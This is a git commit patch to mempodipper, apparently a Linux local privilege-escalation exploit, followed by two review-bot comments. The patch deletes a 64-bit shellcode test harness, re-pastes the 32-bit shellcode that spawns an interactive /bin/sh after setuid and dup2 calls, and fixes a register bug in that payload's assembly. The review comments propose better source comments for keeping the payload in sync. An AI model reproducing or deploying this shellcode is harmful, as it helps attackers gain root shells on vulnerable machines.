From 0333d328b7d0115ea68bc988ed0ced479d09ad31 Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld"
Date: Sun, 22 Jan 2012 06:29:59 +0100
Subject: Right dup value on 32bit.

---
 harness.c | 7 -------
 mempodipper.c | 10 +++++-----
 shellcode-32.s | 1 +
 3 files changed, 6 insertions(+), 12 deletions(-)
 delete mode 100644 harness.c

diff --git a/harness.c b/harness.c
deleted file mode 100644
index 10bf6ce..0000000
--- a/harness.c
+++ /dev/null
@@ -1,7 +0,0 @@
-unsigned char buf[] =
-"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
-"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
-"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
-"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
-"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
-void main() { (*(void(*)())buf)(); }
diff --git a/mempodipper.c b/mempodipper.c
index fb20c26..00c6187 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -205,11 +205,11 @@ int main(int argc, char **argv)
 #if defined(__i386__)
 // See shellcode-32.s in this package for the source.
 char shellcode[] =
- "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\xb3\x06\xb1"
- "\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"
- "\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89\xe0\x31"
- "\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80";
-
+ "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
+ "\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
+ "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
+ "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
+ "\x80";
 #elif defined(__x86_64__)
 // See shellcode-64.s in this package for the source.
 char shellcode[] =
diff --git a/shellcode-32.s b/shellcode-32.s
index d08b93f..bb29701 100644
--- a/shellcode-32.s
+++ b/shellcode-32.s
@@ -14,6 +14,7 @@ xor ebx,ebx
 mov al,0x2e
 int 0x80
 ;dup2(6, 2)
+xor ecx,ecx
 mov bl,0x6
 mov cl,0x2
 mov al,0x3f
--
cgit v1.2.3-59-g8ed1b
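Review bot: The 32-bit `shellcode[]` array in this hunk is a hand-transcribed copy of shellcode-32.s, and the commit itself shows the two drifting apart (the .s gained one instruction and the whole hex string had to be re-pasted), yet the existing `// See shellcode-32.s in this package for the source.` comment does not tell a maintainer that the bytes are not derived automatically and must be regenerated whenever that file changes. I would extend the comment to `// Assembled output of shellcode-32.s; regenerate this array by hand whenever that file changes.` The `#elif defined(__x86_64__)` array at the bottom of the hunk presumably has the same relationship to shellcode-64.s, and its declaration continues outside the hunk. The enclosing main() starts and ends outside the hunk.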
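Review bot: The added `xor ecx,ecx` carries no comment, and the `;dup2(6, 2)` line above it does not explain it either; since `mov cl,0x2` two lines later writes only the low byte of ecx, a reader of the .s alone cannot see that the upper bits were presumably left uninitialised before this commit, which is what the title "Right dup value on 32bit" refers to. I would change the comment to `;dup2(6, 2) -- clear ecx first, mov cl only sets its low byte` so the reason survives the next edit. The rest of the file sits outside the hunk, so I cannot tell whether the other syscall blocks document their register setup.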